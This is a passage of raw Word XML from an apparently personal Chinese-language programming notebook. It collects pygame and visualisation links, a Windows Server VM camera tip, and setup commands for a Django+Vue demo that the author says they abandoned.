    </w:p>
    <w:p w14:paraId="5C87A736" w14:textId="77777777" w:rsidR="003D1116" w:rsidRPr="009C17B7" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B26B7A7" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7760773A" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7AC161" w14:textId="77777777" w:rsidR="009C17B7" w:rsidRDefault="009C17B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A40DA1" w14:textId="77777777" w:rsidR="009C17B7" w:rsidRPr="009C17B7" w:rsidRDefault="009C17B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFF5234" w14:textId="77777777" w:rsidR="00FF4D1F" w:rsidRDefault="00FF4D1F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1101806A" w14:textId="7D324388" w:rsidR="00FF4D1F" w:rsidRDefault="008B7595" w:rsidP="007C28B1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="008B7595">
        <w:t>pygame/pygame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF84FF" w14:textId="2EA6C196" w:rsidR="007C28B1" w:rsidRDefault="007C1003" w:rsidP="007C28B1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Official </w:t>
      </w:r>
      <w:r w:rsidR="00F87DDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tutorial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BF81F" w14:textId="55D4AAF1" w:rsidR="00F87DDB" w:rsidRDefault="00F87DDB" w:rsidP="007C28B1">
      <w:r w:rsidRPr="00F87DDB">
        <w:t>https://github.com/pygame/pygame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3B57C" w14:textId="55399DC0" w:rsidR="008B7595" w:rsidRDefault="00F87DDB" w:rsidP="007C28B1">
      <w:r w:rsidRPr="00F87DDB">
        <w:t>https://www.pygame.org/docs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DDE931" w14:textId="77777777" w:rsidR="008B7595" w:rsidRDefault="008B7595" w:rsidP="007C28B1"/>
    <w:p w14:paraId="350E2946" w14:textId="62342698" w:rsidR="00AA5028" w:rsidRDefault="00773C47" w:rsidP="007C28B1">
      <w:r w:rsidRPr="00773C47">
        <w:t>https://www.youtube.com/watch?v=AY9MnQ4x3zk&amp;t=636s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21944C" w14:textId="77777777" w:rsidR="00AA5028" w:rsidRDefault="00AA5028" w:rsidP="007C28B1"/>
    <w:p w14:paraId="0DA41EB8" w14:textId="798476C6" w:rsidR="00AA5028" w:rsidRDefault="00FE1706" w:rsidP="00FE1706">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可视化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E3E2A1" w14:textId="77777777" w:rsidR="00916B1B" w:rsidRDefault="00916B1B" w:rsidP="007C28B1"/>
    <w:p w14:paraId="37AC9A1B" w14:textId="270CD283" w:rsidR="00AA5028" w:rsidRDefault="00916B1B" w:rsidP="00916B1B">
      <w:hyperlink r:id="rId163" w:history="1">
        <w:r w:rsidRPr="00F4660E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/wuyoudeyuer/article/details/129819096</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58E999C4" w14:textId="77777777" w:rsidR="00916B1B" w:rsidRDefault="00916B1B" w:rsidP="00916B1B"/>
    <w:p w14:paraId="13B77C1F" w14:textId="77777777" w:rsidR="00916B1B" w:rsidRPr="00916B1B" w:rsidRDefault="00916B1B" w:rsidP="00916B1B"/>
    <w:p w14:paraId="7A392719" w14:textId="6C06646D" w:rsidR="00AA5028" w:rsidRDefault="00AA5028" w:rsidP="007C28B1"/>
    <w:p w14:paraId="2C65D8F6" w14:textId="77777777" w:rsidR="00AA5028" w:rsidRDefault="00AA5028" w:rsidP="007C28B1"/>
    <w:p w14:paraId="0E0E0059" w14:textId="77777777" w:rsidR="00AA5028" w:rsidRDefault="00AA5028" w:rsidP="007C28B1"/>
    <w:p w14:paraId="7AF74CE2" w14:textId="77777777" w:rsidR="007C28B1" w:rsidRDefault="007C28B1" w:rsidP="007C28B1"/>
    <w:p w14:paraId="60D63335" w14:textId="77777777" w:rsidR="007C28B1" w:rsidRDefault="007C28B1" w:rsidP="007C28B1"/>
    <w:p w14:paraId="5015D069" w14:textId="77777777" w:rsidR="007C28B1" w:rsidRDefault="007C28B1" w:rsidP="007C28B1"/>
    <w:p w14:paraId="19266D8A" w14:textId="77777777" w:rsidR="007C28B1" w:rsidRPr="007C28B1" w:rsidRDefault="007C28B1" w:rsidP="007C28B1"/>
    <w:p w14:paraId="01A82F17" w14:textId="77777777" w:rsidR="00FF4D1F" w:rsidRDefault="00FF4D1F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="629" w:name="_Toc159780059"/>
      <w:r>
        <w:t>前端</w:t>
      </w:r>
      <w:bookmarkEnd w:id="629"/>
    </w:p>
    <w:p w14:paraId="2C232AE5" w14:textId="77777777" w:rsidR="00FF4D1F" w:rsidRDefault="00FF4D1F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="630" w:name="_Toc159780060"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快速前端：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.layoutit.com/build</w:t>
      </w:r>
      <w:bookmarkEnd w:id="630"/>
    </w:p>
    <w:p w14:paraId="5C316D1B" w14:textId="77777777" w:rsidR="00FF4D1F" w:rsidRDefault="00FF4D1F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前端快速生成器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.layoutit.com/build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3388F3" w14:textId="77777777" w:rsidR="00FF4D1F" w:rsidRDefault="00FF4D1F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CDF56D" w14:textId="72FC539D" w:rsidR="00FF4D1F" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="631" w:name="_Toc159780061"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2012 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加摄像头</w:t>
      </w:r>
      <w:bookmarkEnd w:id="631"/>
    </w:p>
    <w:p w14:paraId="602B3E87" w14:textId="5F029848" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我用的虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65611C13" w14:textId="367A804C" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1498AF4A" wp14:editId="40896EE4">
            <wp:extent cx="4810125" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1964655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55561" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4810125" cy="1247775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2085B298" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ABF81D7" w14:textId="6FB336E4" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点这里，可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中连入摄像头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A7BAEE" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413F9192" w14:textId="1FEB3E5A" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>貌似没有直接打开摄像头的办法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A40ED54" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0775E8" w14:textId="1568490D" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是程序的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>opencv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开摄像头开得了，所以直接用程序测试能不能开摄像头就行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634C441C" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB406E2" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7591DD97" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215FCCC0" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E6819A" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1881EB02" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AFD7F1C" w14:textId="77777777" w:rsidR="00DF3030" w:rsidRPr="00FF4D1F" w:rsidRDefault="00DF3030" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="738B00EF" w14:textId="77777777" w:rsidR="00FF4D1F" w:rsidRDefault="00FF4D1F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061A6463" w14:textId="77777777" w:rsidR="00DC1DED" w:rsidRDefault="00DC1DED" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="632" w:name="_Toc159780062"/>
      <w:r>
        <w:t>Django+VUE前后端分离</w:t>
      </w:r>
      <w:bookmarkEnd w:id="632"/>
    </w:p>
    <w:p w14:paraId="0D0FA254" w14:textId="77777777" w:rsidR="00DC1DED" w:rsidRDefault="00DC1DED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A0E3B" w14:textId="72C52D38" w:rsidR="00F9301B" w:rsidRDefault="00F9301B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F9301B">
        <w:t>https://blog.csdn.net/weixin_42134789/article/details/111714018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265A142F" w14:textId="10E06F04" w:rsidR="00DC1DED" w:rsidRDefault="00DC1DED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC1DED">
        <w:t>https://www.zhihu.com/tardis/zm/art/128976272?source_id=1005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AAC350" w14:textId="77777777" w:rsidR="001A5E39" w:rsidRDefault="001A5E39" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考代码地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="00781D3E">
        <w:t>https://github.com/normal-wls/Blogs-Code.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45890B6E" w14:textId="1385EE6F" w:rsidR="00DC1DED" w:rsidRPr="001A5E39" w:rsidRDefault="00D765ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人评论：这个教程和代码</w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在最后一步不好实现，检查</w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码发现教程写的不完整，运行</w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:t xml:space="preserve">npm run dev </w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vue</w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接返回</w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:t xml:space="preserve">404 </w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，参考</w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00596600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《遇到的问题》</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BED3C70" w14:textId="070CAA03" w:rsidR="00857211" w:rsidRPr="003E5960" w:rsidRDefault="003E5960" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E5960">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>经过三天无法解决该问题，该</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5960">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>demo</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5960">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的最后前后端对接部分放弃复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE84B5" w14:textId="77777777" w:rsidR="00206791" w:rsidRDefault="00206791" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68119C6C" w14:textId="77777777" w:rsidR="001A5E39" w:rsidRDefault="001A5E39" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDEB69E" w14:textId="38CE736A" w:rsidR="005E7C78" w:rsidRPr="00DC1DED" w:rsidRDefault="005E7C78" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35885B78" w14:textId="2C3EE01C" w:rsidR="00DC1DED" w:rsidRDefault="005E7C78" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00264B80">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>django-admin startproject book_demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B29E2A2" w14:textId="77777777" w:rsidR="00DC1DED" w:rsidRDefault="00DC1DED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EF9F00" w14:textId="444F61F0" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行进入后端文件夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>book_demo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，输入下面命令，浏览器登陆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>127.0.0.1:8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看见欢迎页即成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E84B1A" w14:textId="61B3A860" w:rsidR="00DC1DED" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00162DA7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python manage.py runserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0100525D" w14:textId="77777777" w:rsidR="0011641D" w:rsidRDefault="0011641D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC1CB10" w14:textId="1324E66B" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再进入前端文件夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>appfront</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，输入下面命令，浏览器登陆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>127.0.0.1:8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看见欢迎页即成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD82C3" w14:textId="7B980C83" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00162DA7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm run dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E41F6" w14:textId="77777777" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740E3270" w14:textId="77777777" w:rsidR="00B45730" w:rsidRDefault="00B45730" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6183573A" w14:textId="71719B41" w:rsidR="00B45730" w:rsidRDefault="00B45730" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="633" w:name="_Toc159780063"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>jango-rest-framework</w:t>
      </w:r>
      <w:r w:rsidR="002C6D8E">
        <w:t>(DRF)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的常用插件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="633"/>
    </w:p>
    <w:p w14:paraId="4456397A" w14:textId="77777777" w:rsidR="00B45730" w:rsidRDefault="00B45730" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BACE25" w14:textId="77777777" w:rsidR="00B45730" w:rsidRDefault="00B45730" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B457360" w14:textId="479BFB6F" w:rsidR="00162DA7" w:rsidRDefault="00433195" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做后端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的常用插件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>jango-rest-framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42681134" w14:textId="6EDE74B5" w:rsidR="00162DA7" w:rsidRPr="00294F18" w:rsidRDefault="00433195" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pip install django-rest-framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA53D1" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CE5FCD" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="533E2472" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="634" w:name="_Toc159780064"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DRF</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A709C9">
        <w:t>django-rest-framework</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
